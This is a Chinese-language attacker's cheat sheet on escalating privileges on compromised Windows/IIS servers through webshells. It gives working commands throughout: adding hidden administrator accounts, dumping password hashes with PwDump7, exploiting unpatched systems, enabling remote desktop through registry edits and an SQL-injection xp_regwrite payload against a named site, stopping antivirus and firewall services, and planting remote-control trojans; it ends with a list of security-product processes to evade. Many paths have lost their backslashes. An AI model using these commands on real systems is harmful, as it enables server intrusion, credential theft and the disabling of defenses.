【1. 能不能执行 cmd 就看这个命令：net user，net 不行就用 net1，再不行就上传一个 net 到可写可读目录，执行 /c c:windowstempcookiesnet1.exe user

2. 当提权成功，3389 没开的情况下，上传开 3389 的 vps 没成功时，试试上传 rootkit.asp 用刚提权的用户登录进去就是 system 权限，再试试一般就可以了。

3.cmd 拒绝访问的话就自己上传一个 cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe/cmd.com/cmd.txt 都可以。

4.cmd 命令：systeminfo，看看有没有 KB952004、KB956572、KB970483 这三个补丁，如果没有，第一个是 pr 提权，第二个是巴西烤肉提权，第三个是 iis6.0 提权。

6.c:windowstempcookies  这个目录

7. 找 sa 密码或是 root 密码，直接利用大马的文件搜索功能直接搜索，超方便！

8.cmd 执行 exp 没回显的解决方法：com 路径那里输入 exp 路径 C:RECYCLERpr.exe，命令那里清空 (包括 /c ) 输入”net user jianmei daxia /add”

9. 增加用户并提升为管理员权限之后，如果连接不上 3389，上传 rootkit.asp 脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。

10. 有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码 (hash 值)”，俩个都上传，执行 PwDump7.exe 就可以了，之后到网站去解密即可。

11. 有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令 tasklist 查看进程

12. 其实星外提权只要一个可执行的文件即可，先运行一遍 cmd，之后把星外 ee.exe 命名为 log.csv 就可以执行了。

13. 用 wt.asp 扫出来的目录，其中红色的文件可以替换成 exp，执行命令时 cmd 那里输入替换的文件路径，下面清空双引号加增加用户的命令。

14. 提权很无奈的时候，可以试试 TV 远控，通杀内外网，穿透防火墙，很强大的。

15. 当可读可写目录存在空格的时候，会出现这样的情况：’Cocuments’ 不是内部或外部命令，也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互 shell 切换到 exp 路径，如：Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目录 然后再执行 exp 或者 cmd，就不会存在上面的情况了，aspshell 一般是无法跳转目录的～

16. 有时候可以添加用户，但是添加不到管理组，有可能是 administrators 改名了，net user administrator 看下本地组成员，*administrators

17. 进入服务器，可以继续内网渗透  这个时候可以尝试打开路由器 默认帐号密码 admin  admin

18. 有的 cmd 执行很变态，asp 马里，cmd 路径填上面，下面填：””c:xxxexp.exe “whoami”  记得前面加两个双引号，不行后面也两个，不行就把 exp 的路径放在 cmd 那里，下面不变。

19. 一般增加不上用户，或是想添加增加用户的 vbs,bat, 远控小马到服务器的启动项里，用“直接使服务器蓝屏重启的东东”这个工具可以实现，

20. 执行 PwDump7.exe 抓哈希值的时候，建议重定向结果到保存为 1.txt /c c:windowstempcookiesPwDump7.exe >1.txt

21. 菜刀执行的技巧，上传 cmd 到可执行目录，右击 cmd 虚拟终端，help 然后 setp c:windowstempcmd.exe 设置终端路径为：c:windowstempcmd.exe

22. 当不支持 aspx，或是支持但跨不了目录的时候，可以上传一个读 iis 的 vps，执行命令列出所有网站目录，找到主站的目录就可以跨过去了。 上传 cscript.exe 到可执行目录，接着上传 iispwd.vbs 到网站根目录，cmd 命令 /c “c:windowstempcookiescscript.exe” d:webiispwd.vbs

23. 如何辨别服务器是不是内网？
192.168.x.x    172.16.x.x    10.x.x.x

(( dos 命令大全 ))
查看版本：ver 查看权限：whoami
查看配置：systeminfo 查看用户：net user
查看进程：tasklist
查看正在运行的服务：tasklist /svc
查看开放的所有端口：netstat -ano
查询管理用户名：query user
查看搭建环境：ftp 127.0.0.1
查看指定服务的路径：sc qc Mysql
添加一个用户：net user jianmei daxia.asd /add
提升到管理权限：net localgroup administrators jianmei /add
添加用户并提升权限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用户信息：net user jianmei
查看所有管理权限的用户：net localgroup administrators
加入远程桌面用户组：net localgroup “Remote Desktop Users” jianmei /add
突破最大连接数：mstsc /admin /v:127.0.0.1
删除用户：net user jianmei /del
删除管理员账户 :net user administrator daxia.asd
更改系统登陆密码：net password daxia.asd
激活 GUEST 用户：net user guest /active:yes
开启 TELNET 服务：net start telnet
关闭麦咖啡：net stop “McAfee McShield”
关闭防火墙：net stop sharedaccess
查看当前目录的所有文件：dir c:windows
查看制定文件的内容：type c:windows1.asp
把 cmd.exe 复制到 c:windows 的 temp 目录下并命名为 cmd.txt：copy c:windowstempcookiescmd.exe c:windowstempcmd.txt

开 3389 端口的命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 查看补丁：dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt (( SQL 语句直接开启 3389 ))

3389 登陆关键注册表位置：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections 其中键值 DenyTSConnections 直接控制着 3389 的开启和关闭，当该键值为 0 表示 3389 开启，1 则表示关闭。 而 MSSQL 的 xp_regwrite 的存储过程可以对注册进行修改，我们使用这点就可以简单的修改 DenyTSConnections 键值，从而控制 3389 的关闭和开启。

开启 3389 的 SQL 语句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–

关闭 3389 的 SQL 语句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
(( 常见杀软 ))

360tray.exe  360 实时保护 ZhuDongFangYu.exe  360 主动防御 KSafeTray.exe  金山卫士 McAfee McShield.exe  麦咖啡 SafeDogUpdateCenter.exe  服务器安全狗